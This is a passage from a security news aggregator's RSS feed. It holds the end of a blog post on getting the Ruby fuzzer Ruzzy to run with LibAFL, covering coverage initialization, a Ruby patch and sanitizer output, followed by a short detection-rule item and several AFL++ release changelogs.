<li>Calls <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_libfuzzer/runtime/src/lib.rs#L694"><code>fuzz::fuzz</code></a></li>
<li>Calls <a href="https://github.com/AFLplusplus/LibAFL/blob/0.15.4/crates/libafl_libfuzzer/runtime/src/fuzz.rs#L271-L274"><code>fuzz_with!</code></a></li>
<li>Checks if coverage counters exist</li>
</ul>
</li>
<li>libFuzzer <a href="https://github.com/llvm/llvm-project/blob/llvmorg-22.1.1/compiler-rt/lib/fuzzer/FuzzerDriver.cpp#L934"><code>LLVMFuzzerRunDriver</code></a>
<ul>
<li>Calls <a href="https://github.com/llvm/llvm-project/blob/llvmorg-22.1.1/compiler-rt/lib/fuzzer/FuzzerDriver.cpp#L652"><code>FuzzerDriver</code></a></li>
<li>Eventually calls <a href="https://github.com/llvm/llvm-project/blob/llvmorg-22.1.1/compiler-rt/lib/fuzzer/FuzzerDriver.cpp#L923"><code>Fuzzer::Loop</code></a></li>
<li>Does not check if coverage counters exist</li>
</ul>
</li>
</ul>
<p>So coverage <code>init</code> functions are called at DSO load time, after which the fuzzing engine may or may not check for their existence depending on implementation. To fully understand the cause of this error, we have to go back and better understand how Ruzzy runs its “dummy” C extension. The Ruzzy Docker image runs the “dummy” code by default via its entrypoint:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-ruby" data-lang="ruby"><span class="line"><span class="cl"><span class="ch">#!/bin/bash</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="no">LD_PRELOAD</span><span class="o">=</span><span class="err">$</span><span class="p">(</span><span class="n">ruby</span> <span class="o">-</span><span class="n">e</span> <span class="s1">'require "ruzzy"; print Ruzzy::ASAN_PATH'</span><span class="p">)</span> <span class="p">\</span>
</span></span><span class="line hl"><span class="cl"> <span class="n">ruby</span> <span class="o">-</span><span class="n">e</span> <span class="s1">'require "ruzzy"; Ruzzy.dummy'</span> <span class="o">--</span> <span class="s2">"$@"</span></span></span></code></pre>
 <figcaption><span>Figure 8: Docker image entrypoint (entrypoint.sh)</span></figcaption>
</figure>
<p><code>Ruzzy.dummy</code> corresponds to the following code:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-ruby" data-lang="ruby"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">fuzz</span><span class="p">(</span><span class="n">test_one_input</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="no">DEFAULT_ARGS</span><span class="p">)</span>
</span></span><span class="line hl"><span class="cl"> <span class="n">c_fuzz</span><span class="p">(</span><span class="n">test_one_input</span><span class="p">,</span> <span class="n">args</span><span class="p">)</span> <span class="c1"># STEP 3: Call Ruzzy.c_fuzz (in C extension)</span>
</span></span><span class="line"><span class="cl"><span class="k">end</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line hl"><span class="cl"><span class="k">def</span> <span class="nf">dummy_test_one_input</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="c1"># STEP 4: Eventually call Ruzzy.dummy_test_one_input</span>
</span></span><span class="line"><span class="cl"> <span class="c1"># This 'require' depends on LD_PRELOAD, so it's placed inside the function</span>
</span></span><span class="line"><span class="cl"> <span class="c1"># scope. This allows us to access EXT_PATH for LD_PRELOAD and not have a</span>
</span></span><span class="line"><span class="cl"> <span class="c1"># circular dependency.</span>
</span></span><span class="line"><span class="cl"> <span class="nb">require</span> <span class="s1">'dummy/dummy'</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="n">c_dummy_test_one_input</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="k">end</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line hl"><span class="cl"><span class="k">def</span> <span class="nf">dummy</span> <span class="c1"># STEP 1: Call Ruzzy.dummy</span>
</span></span><span class="line hl"><span class="cl"> <span class="n">fuzz</span><span class="p">(</span><span class="o">-&gt;</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="p">{</span> <span class="n">dummy_test_one_input</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="p">})</span> <span class="c1"># STEP 2: Call Ruzzy.fuzz</span>
</span></span><span class="line"><span class="cl"><span class="k">end</span></span></span></code></pre>
 <figcaption><span>Figure 9: Ruzzy.dummy call chain (lib/ruzzy.rb)</span></figcaption>
</figure>
<p>If you’re searching for the bug, then the body of <code>dummy_test_one_input</code> may provide a hint. The issue here is that <code>require 'dummy/dummy'</code> is called too late. This <code>require</code> statement is actually loading the compiled Ruby C extension shared object. Remember what we learned above about loading shared objects? This shared object contains an <code>.init_array</code> function that initializes the coverage counter state. libFuzzer lazily uses coverage counter state, so it is not so sensitive about the ordering of events. LibAFL, however, requires that this state already be initialized before it begins fuzzing.</p>
<p><code>Ruzzy.dummy</code> calls <code>fuzz</code> with a lambda that calls <code>dummy_test_one_input</code>. But because <code>dummy_test_one_input</code> is passed in a lambda and not invoked until the fuzzer starts, LibAFL errors out in the call to <code>c_fuzz</code> (<code>c_fuzz</code> calls <code>LLVMFuzzerRunDriver</code>). This makes sense given that the initial Ruby error traceback pointed at <code>c_fuzz</code>. So we end up with a quite minimal patch:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-diff" data-lang="diff"><span class="line"><span class="cl"><span class="gh">diff --git a/lib/ruzzy.rb b/lib/ruzzy.rb
</span></span></span><span class="line"><span class="cl"><span class="gh">index d5e9ae61..be5f8339 100644
</span></span></span><span class="line"><span class="cl"><span class="gh"></span><span class="gd">--- a/lib/ruzzy.rb
</span></span></span><span class="line"><span class="cl"><span class="gd"></span><span class="gi">+++ b/lib/ruzzy.rb
</span></span></span><span class="line"><span class="cl"><span class="gi"></span><span class="gu">@@ -25,6 +25,11 @@ module Ruzzy
</span></span></span><span class="line"><span class="cl"><span class="gu"></span> end
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> def dummy
</span></span><span class="line"><span class="cl"><span class="gi">+ # Load the instrumented shared object before calling fuzz so its coverage
</span></span></span><span class="line"><span class="cl"><span class="gi">+ # maps are registered before LLVMFuzzerRunDriver starts. Some fuzzer
</span></span></span><span class="line"><span class="cl"><span class="gi">+ # runtimes (e.g. LibAFL) require coverage maps to exist upfront.
</span></span></span><span class="line"><span class="cl"><span class="gi">+ require 'dummy/dummy'
</span></span></span><span class="line"><span class="cl"><span class="gi">+
</span></span></span><span class="line"><span class="cl"><span class="gi"></span> fuzz(-&gt;(data) { dummy_test_one_input(data) })
</span></span><span class="line"><span class="cl"> end
</span></span></code></pre>
 <figcaption><span>Figure 10: Ruzzy.dummy initialization patch</span></figcaption>
</figure>
<p>With the <code>ld</code> and initialization patches, LibAFL finally works (!):</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">$ docker run --rm ruzzy-libafl -runs=100000
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl"> (CLIENT) corpus: 3, objectives: 0, executions: 7593, exec/sec: 0.000,
</span></span><span class="line"><span class="cl">size_edges: 12/21 (57%), edges_stability: 11/11 (100%), edges: 12/21 (57%)
</span></span><span class="line"><span class="cl">=================================================================
</span></span><span class="line hl"><span class="cl">==9==ERROR: AddressSanitizer: heap-use-after-free on address 0xfcbfab6655c0 at pc 0xffffab9c1888 bp 0xffffee4ce430 sp 0xffffee4ce428
</span></span><span class="line"><span class="cl">READ of size 1 at 0xfcbfab6655c0 thread T0
</span></span><span class="line hl"><span class="cl"> #0 0xffffab9c1884 in _c_dummy_test_one_input /usr/local/bundle/gems/ ruzzy-0.7.0/ext/dummy/dummy.c:18:24
</span></span><span class="line"><span class="cl">...</span></span></code></pre>
 <figcaption><span>Figure 11: Ruzzy fuzzing with LibAFL</span></figcaption>
</figure>
<p>This AddressSanitizer output shows that LibAFL starts cleanly and quickly finds the intentional bug in <code>dummy.c</code>. The heap-use-after-free in the dummy C extension confirms the full pipeline is working: instrumentation, coverage tracking, tracing, and crash detection are all functioning as expected.</p>
<h2>Try out Ruzzy with LibAFL</h2>
<p>We recently released <a href="https://github.com/trailofbits/ruzzy/blob/main/CHANGELOG.md#080---2026-04-27">version 0.8.0</a> of Ruzzy, which includes LibAFL support. Give it a spin on your next Ruby project or audit. I worked with Claude on implementing this improvement, and sometimes it would race so far ahead to the finish line that it would take me two days to catch up. Getting a working implementation is still the end goal, and reverse engineering a patch is a lot easier after it <em>is</em> working, but deeply understanding the patch is valuable too. I learned a lot about ELF binaries, fuzzing engine internals, linkers, and compilers throughout this process. LLMs are a useful tool not only for getting stuff done, but also for understanding the world around us.</p>
<p>If you’d like to read more about fuzzing, check out the following resources:</p>
<ul>
<li>Our <a href="https://appsec.guide/docs/fuzzing/">fuzzing chapter</a> in the Testing Handbook</li>
<li><a href="https://blog.trailofbits.com/2024/02/23/continuously-fuzzing-python-c-extensions/">Continuously fuzzing Python C extensions</a></li>
<li><a href="https://blog.trailofbits.com/2020/06/05/breaking-the-solidity-compiler-with-a-fuzzer/">Breaking the Solidity Compiler with a Fuzzer</a></li>
</ul>
<p>As always, <a href="https://trailofbits.com/contact/">contact us</a> if you need help with your next Ruby project or fuzzing campaign.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Detecting Web Server Probing & Fuzzing in Traefik with Automated Cloudflare Response]]></title>
<description><![CDATA[This article shows how a customized Elastic Security ES|QL detection rule can identify web server probing and fuzzing activity in Traefik logs and automatically block the attacking IP via Cloudflare.]]></description>
<link>https://tsecurity.de/de/3501356/it-security-nachrichten/detecting-web-server-probing-fuzzing-in-traefik-with-automated-cloudflare-response/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501356/it-security-nachrichten/detecting-web-server-probing-fuzzing-in-traefik-with-automated-cloudflare-response/</guid>
<pubDate>Fri, 08 May 2026 23:18:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This article shows how a customized Elastic Security ES|QL detection rule can identify web server probing and fuzzing activity in Traefik logs and automatically block the attacking IP via Cloudflare.]]></content:encoded>
</item>
<item>
<title><![CDATA[4.10c]]></title>
<description><![CDATA[Version ++4.10c (release)

afl-fuzz:

default power schedule is now EXPLORE, due a fix in fast schedules
explore is slightly better now.
fixed minor issues in the mutation engine, thanks to @futhewo for
reporting!
better deterministic fuzzing is now available, benchmarks have shown
to improve fuz...]]></description>
<link>https://tsecurity.de/de/3501318/it-security-tools/410c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501318/it-security-tools/410c/</guid>
<pubDate>Fri, 08 May 2026 23:13:02 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++4.10c (release)</h3>
<ul>
<li>afl-fuzz:
<ul>
<li>default power schedule is now EXPLORE, due a fix in fast schedules<br>
explore is slightly better now.</li>
<li>fixed minor issues in the mutation engine, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/futhewo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/futhewo">@futhewo</a> for<br>
reporting!</li>
<li>better deterministic fuzzing is now available, benchmarks have shown<br>
to improve fuzzing. Enable with -D. Thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kdsjZh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kdsjZh">@kdsjZh</a> for the PR!</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>large rewrite by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SonicStark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SonicStark">@SonicStark</a> which fixes a few corner cases, thanks!</li>
<li>LTO mode now requires llvm 12+</li>
<li>workaround for ASAN with gcc_plugin mode</li>
</ul>
</li>
<li>instrumentation:
<ul>
<li>LLVM 18 support, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devnexen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devnexen">@devnexen</a>!</li>
<li>Injection (SQL, LDAP, XSS) fuzzing feature now available, see<br>
<code>instrumentation/README.injections.md</code> how to activate/use/expand.</li>
<li>compcov/LAF-intel:
<ul>
<li>floating point splitting bug fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hexcoder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hexcoder">@hexcoder</a></li>
<li>due a bug in LLVM 17 integer splitting is disabled there!</li>
<li>when splitting floats was selected, integers were always split as well,<br>
fixed to require AFL_LLVM_LAF_SPLIT_COMPARES or _ALL as it should</li>
</ul>
</li>
<li>dynamic instrumentation filtering for LLVM NATIVE, thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/mozilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mozilla">@mozilla</a>!<br>
see utils/dynamic_covfilter/README.md</li>
</ul>
</li>
<li>qemu_mode:
<ul>
<li>plugins are now activated by default and a new module is included that<br>
produces drcov compatible traces for lighthouse/lightkeeper/...<br>
thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JRomainG/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JRomainG">@JRomainG</a> to submitting!</li>
</ul>
</li>
<li>updated Nyx checkout (fixes a bug) and some QOL</li>
<li>updated the custom grammar mutator</li>
<li>document afl-cmin does not work on macOS (but afl-cmin.bash does)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[4.20c]]></title>
<description><![CDATA[Version ++4.20c (release)
! A new forkserver communication model is now introduced. afl-fuzz is
backward compatible to old compiled targets if they are not built
for CMPLOG/Redqueen, but new compiled targets will not work with
old afl-fuzz versions!
! Recompile all targets that are instrumented f...]]></description>
<link>https://tsecurity.de/de/3501317/it-security-tools/420c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501317/it-security-tools/420c/</guid>
<pubDate>Fri, 08 May 2026 23:13:01 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++4.20c (release)</h3>
<p>! A new forkserver communication model is now introduced. afl-fuzz is<br>
backward compatible to old compiled targets if they are not built<br>
for CMPLOG/Redqueen, but new compiled targets will not work with<br>
old afl-fuzz versions!<br>
! Recompile all targets that are instrumented for CMPLOG/Redqueen!</p>
<ul>
<li>AFL++ now supports up to 4 billion coverage edges, up from 6 million.</li>
<li>New compile option: <code>make PERFORMANCE=1</code> - this will enable special<br>
CPU dependent optimizations that make everything more performant - but<br>
the binaries will likely won't work on different platforms. Also<br>
enables a faster hasher if the CPU requirements are met.</li>
<li>The persistent record feature (see config.h) was expanded to also<br>
support replay, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quarta-qti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quarta-qti">@quarta-qti</a> !</li>
<li>afl-fuzz:
<ul>
<li>the new deterministic fuzzing feature is now activated by default,<br>
deactivate with -z. Parameters -d and -D are ignored.</li>
<li>small improvements to CMPLOG/redqueen</li>
<li>workround for a bug with MOpt -L when used with -M - in the future<br>
we will either remove or rewrite MOpt.</li>
<li>fix for <code>-t xxx+</code> feature</li>
<li>-e extension option now saves the queue items, crashes, etc. with the<br>
extension too</li>
<li>fixes for trimmming, correct -V time and reading stats on resume by eqv<br>
thanks a lot!</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>added collision free caller instrumentation to LTO mode. activate with<br>
<code>AFL_LLVM_LTO_CALLER=1</code>. You can set a max depth to go through single<br>
block functions with <code>AFL_LLVM_LTO_CALLER_DEPTH</code> (default 0)</li>
<li>fixes for COMPCOV/LAF and most other modules</li>
<li>fix for GCC_PLUGIN cmplog that broke on std::strings</li>
</ul>
</li>
<li>afl-whatsup:
<ul>
<li>now also displays current average speed</li>
<li>small bugfixes</li>
</ul>
</li>
<li>Fixes for aflpp custom mutator and standalone tool</li>
<li>Minor edits to afl-persistent-config</li>
<li>Prevent temporary files being left behind on aborted afl-whatsup</li>
<li>More CPU benchmarks added to benchmark/</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[4.20c]]></title>
<description><![CDATA[Version ++4.20c (release)
! A new forkserver communication model is now introduced. afl-fuzz is
backward compatible to old compiled targets if they are not built
for CMPLOG/Redqueen, but new compiled targets will not work with
old afl-fuzz versions!
! Recompile all targets that are instrumented f...]]></description>
<link>https://tsecurity.de/de/3501316/it-security-tools/420c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501316/it-security-tools/420c/</guid>
<pubDate>Fri, 08 May 2026 23:13:01 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++4.20c (release)</h3>
<p>! A new forkserver communication model is now introduced. afl-fuzz is<br>
backward compatible to old compiled targets if they are not built<br>
for CMPLOG/Redqueen, but new compiled targets will not work with<br>
old afl-fuzz versions!<br>
! Recompile all targets that are instrumented for CMPLOG/Redqueen!</p>
<ul>
<li>AFL++ now supports up to 4 billion coverage edges, up from 6 million.</li>
<li>New compile option: <code>make PERFORMANCE=1</code> - this will enable special<br>
CPU dependent optimizations that make everything more performant - but<br>
the binaries will likely won't work on different platforms. Also<br>
enables a faster hasher if the CPU requirements are met.</li>
<li>The persistent record feature (see config.h) was expanded to also<br>
support replay, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quarta-qti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quarta-qti">@quarta-qti</a> !</li>
<li>afl-fuzz:
<ul>
<li>the new deterministic fuzzing feature is now activated by default,<br>
deactivate with -z. Parameters -d and -D are ignored.</li>
<li>small improvements to CMPLOG/redqueen</li>
<li>workround for a bug with MOpt -L when used with -M - in the future<br>
we will either remove or rewrite MOpt.</li>
<li>fix for <code>-t xxx+</code> feature</li>
<li>-e extension option now saves the queue items, crashes, etc. with the<br>
extension too</li>
<li>fixes for trimmming, correct -V time and reading stats on resume by eqv<br>
thanks a lot!</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>added collision free caller instrumentation to LTO mode. activate with<br>
<code>AFL_LLVM_LTO_CALLER=1</code>. You can set a max depth to go through single<br>
block functions with <code>AFL_LLVM_LTO_CALLER_DEPTH</code> (default 0)</li>
<li>fixes for COMPCOV/LAF and most other modules</li>
<li>fix for GCC_PLUGIN cmplog that broke on std::strings</li>
</ul>
</li>
<li>afl-whatsup:
<ul>
<li>now also displays current average speed</li>
<li>small bugfixes</li>
</ul>
</li>
<li>Fixes for aflpp custom mutator and standalone tool</li>
<li>Minor edits to afl-persistent-config</li>
<li>Prevent temporary files being left behind on aborted afl-whatsup</li>
<li>More CPU benchmarks added to benchmark/</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.30c]]></title>
<description><![CDATA[Version ++4.30c (release)
! afl-gcc and afl-clang funcionality is now removed !

afl-fuzz:

fastresume feature added. if you abort fuzzing and resume fuzzing
with -i - or AFL_AUTORESUME=1 and the target binary has not changed
then a dump will be loaded and the calibration phase skipped.
to disabl...]]></description>
<link>https://tsecurity.de/de/3501314/it-security-tools/v430c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501314/it-security-tools/v430c/</guid>
<pubDate>Fri, 08 May 2026 23:12:59 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++4.30c (release)</h3>
<p>! afl-gcc and afl-clang funcionality is now removed !</p>
<ul>
<li>afl-fuzz:
<ul>
<li>fastresume feature added. if you abort fuzzing and resume fuzzing<br>
with <code>-i -</code> or <code>AFL_AUTORESUME=1</code> and the target binary has not changed<br>
then a dump will be loaded and the calibration phase skipped.<br>
to disable this feature set <code>AFL_NO_FASTRESUME=1</code><br>
zlib compression is used if zlib is found at compile time</li>
<li>improved seed selection algorithm</li>
<li>added <code>AFL_CUSTOM_MUTATOR_LATE_SEND=1</code> to call the custom send()<br>
function after the target has been restarted.</li>
<li>because of bad math and undefined behaviour fixes we have to change<br>
the CMPLOG map. <strong>YOU NEED TO RECOMPILE CMPLOG TARGETS</strong></li>
<li>fixed custom_post_process for calibration</li>
<li>fixes for AFL_EXIT_ON_TIME and AFL_EXIT_WHEN_DONE, changed behaviour of<br>
AFL_EXIT_WHEN_DONE to finish when really done :-)</li>
</ul>
</li>
<li>frida_mode:
<ul>
<li>AFL_FRIDA_PERSISTENT_ADDR can now be be any reachable address not just<br>
a function entry</li>
<li>AFL_DEBUG is now the same as AFL_FRIDA_VERBOSE</li>
<li>AFL_FRIDA_DEBUG_MAPS now works as expected</li>
</ul>
</li>
<li>qemu_mode:
<ul>
<li>new hooks supported (optional), see qemu_mode/hooking_bridge - thanks to<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CowBoy4mH3LL/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CowBoy4mH3LL">@CowBoy4mH3LL</a></li>
</ul>
</li>
<li>unicorn_mode:
<ul>
<li>fix install and forkserver (thanks aarnav!)</li>
<li>pin unicorn version</li>
</ul>
</li>
<li>nyx_mode:
<ul>
<li>bugfixes</li>
</ul>
</li>
<li>custom mutators:
<ul>
<li>custom_send_tcp custom mutator added, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dergoegge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dergoegge">@dergoegge</a></li>
</ul>
</li>
<li>afl-cc
<ul>
<li>fix to support pointless changes in LLVM 20</li>
<li>new runtime (!) variable: <code>AFL_OLD_FORKSERVER</code> to use the old vanilla<br>
AFL type forkserver. Useful for symcc/symqemu/nautilus/etc. with<br>
AFL_LLVM_INSTRUMENT=CLASSIC</li>
<li>new compile time variable: <code>AFL_OPT_LEVEL</code> to set a specific optimization<br>
level, default is <code>3</code></li>
<li>correctly explain how to get the correct map size for large targets</li>
<li>small fix for weird LLVM defines in redhat</li>
</ul>
</li>
<li>code formatting updated to llvm 18</li>
<li>improved custom_mutators/aflpp/standalone/aflpp-standalone</li>
<li>added custom_mutators/autotokens/standalone/autotokens-standalone</li>
<li>AFL++ headers are now installed to $PREFIX/include/afl</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.21c]]></title>
<description><![CDATA[Version ++4.21c (release)

afl-fuzz

fixed a regression in afl-fuzz that resulted in a 5-10% performace loss
do a switch from gettimeofday() to clock_gettime() which should be rather
three times faster. The reason for this is unknown.
new queue selection algorithm based on 2 core years of queue d...]]></description>
<link>https://tsecurity.de/de/3501315/it-security-tools/v421c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501315/it-security-tools/v421c/</guid>
<pubDate>Fri, 08 May 2026 23:12:59 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++4.21c (release)</h3>
<ul>
<li>afl-fuzz
<ul>
<li>fixed a regression in afl-fuzz that resulted in a 5-10% performace loss<br>
do a switch from gettimeofday() to clock_gettime() which should be rather<br>
three times faster. The reason for this is unknown.</li>
<li>new queue selection algorithm based on 2 core years of queue data<br>
analysis. gives a noticable improvement on coverage although the results<br>
seem counterintuitive :-)</li>
<li>added AFL_DISABLE_REDUNDANT for huge queues</li>
<li>added <code>AFL_NO_SYNC</code> environment variable that does what you think it does</li>
<li>fix AFL_PERSISTENT_RECORD</li>
<li>run custom_post_process after standard trimming</li>
<li>prevent filenames in the queue that have spaces</li>
<li>minor fix for FAST schedules</li>
<li>more frequent stats update when syncing (todo: check performance impact)</li>
<li>now timing of calibration, trimming and syncing is measured seperately,<br>
thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eqv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eqv">@eqv</a>!</li>
<li>-V timing is now accurately the fuzz time (without syncing), before<br>
long calibration times and syncing could result in now fuzzing being<br>
made when the time was already run out until then, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eqv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eqv">@eqv</a>!</li>
<li>fix -n uninstrumented mode when ending fuzzing</li>
<li>enhanced the ASAN configuration</li>
<li>make afl-fuzz use less memory with cmplog and fix a memleak</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>re-enable i386 support that was accidently disabled</li>
<li>fixes for LTO and outdated afl-gcc mode for i386</li>
<li>fix COMPCOV split compare for old LLVMs</li>
<li>disable xml/curl/g_ string transform functions because we do not check<br>
for null pointers ... TODO</li>
<li>ensure shared memory variables are visible in weird build setups</li>
<li>compatability to new LLVM 19 changes</li>
</ul>
</li>
<li>afl-cmin
<ul>
<li>work with input files that have a space</li>
</ul>
</li>
<li>afl-showmap
<ul>
<li>fix memory leak on shmem testcase usage (thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ndrewh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ndrewh">@ndrewh</a>)</li>
<li>minor fix to collect coverage -C (thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bet4it/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bet4it">@bet4it</a>)</li>
</ul>
</li>
<li>Fixed a shmem mmap bug (that rarely came up on MacOS)</li>
<li>libtokencap: script generate_libtoken_dict.sh added by @a-shvedov</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.31c]]></title>
<description><![CDATA[Version ++4.31c (release)

SAND mode added (docs/SAND.md) for more effecient fuzzing with sanitizers
(thanks to @wtdcode !)
afl-fuzz:

splicing phase is now DISABLED by default because research showed
it is counterproductive. New command line parameter -u to enable
it. Splicing is auto-enabled if...]]></description>
<link>https://tsecurity.de/de/3501313/it-security-tools/v431c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501313/it-security-tools/v431c/</guid>
<pubDate>Fri, 08 May 2026 23:12:58 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++4.31c (release)</h3>
<ul>
<li>SAND mode added (docs/SAND.md) for more effecient fuzzing with sanitizers<br>
(thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wtdcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wtdcode">@wtdcode</a> !)</li>
<li>afl-fuzz:
<ul>
<li>splicing phase is now DISABLED by default because research showed<br>
it is counterproductive. New command line parameter <code>-u</code> to enable<br>
it. Splicing is auto-enabled if two cycles without finds happen.</li>
<li>Python 3.13+ support</li>
<li>loose file and shared memory permissions on Android and iPhone</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>LLVM 20 support (again - please don't change the API all the time ...)</li>
<li>-fsanitize=fuzzer now inserts libAFLDriver.a addtionally early to help<br>
compiling if LLVMFuzzerTestOneOnput is in an .a archive</li>
<li>added _<em>sanitizer_weak_hook</em>* functions (in case that is helpful in<br>
weird setups)</li>
<li>fix bug with large map sizes when multiple libraries are loaded after<br>
the shared memory was obtained.</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.35c]]></title>
<description><![CDATA[Version ++4.35a (release)

GUIFuzz++ merged: Unleashing Grey-box Fuzzing on Desktop Graphical User
Interfacing Applications
https://futures.cs.utah.edu/papers/25ASE.pdf
afl-fuzz:

fix syncing issues with crashes and custom mutators by @AndyH-1
another attempt to kill every client, thanks to @leon...]]></description>
<link>https://tsecurity.de/de/3501309/it-security-tools/v435c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501309/it-security-tools/v435c/</guid>
<pubDate>Fri, 08 May 2026 23:12:50 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++4.35a (release)</h3>
<ul>
<li>GUIFuzz++ merged: Unleashing Grey-box Fuzzing on Desktop Graphical User<br>
Interfacing Applications<br>
<a href="https://futures.cs.utah.edu/papers/25ASE.pdf" rel="nofollow">https://futures.cs.utah.edu/papers/25ASE.pdf</a></li>
<li>afl-fuzz:
<ul>
<li>fix syncing issues with crashes and custom mutators by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AndyH-1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AndyH-1">@AndyH-1</a></li>
<li>another attempt to kill every client, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonasdev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonasdev">@leonasdev</a></li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>Huge refactor for default pcguard instrumentation, several minor and<br>
medium bug fixes, complete hidden decision coverage</li>
<li>LTO: also added complete hidden decision coverage</li>
<li>Various small fixes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbars/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbars">@nbars</a>, thanks!</li>
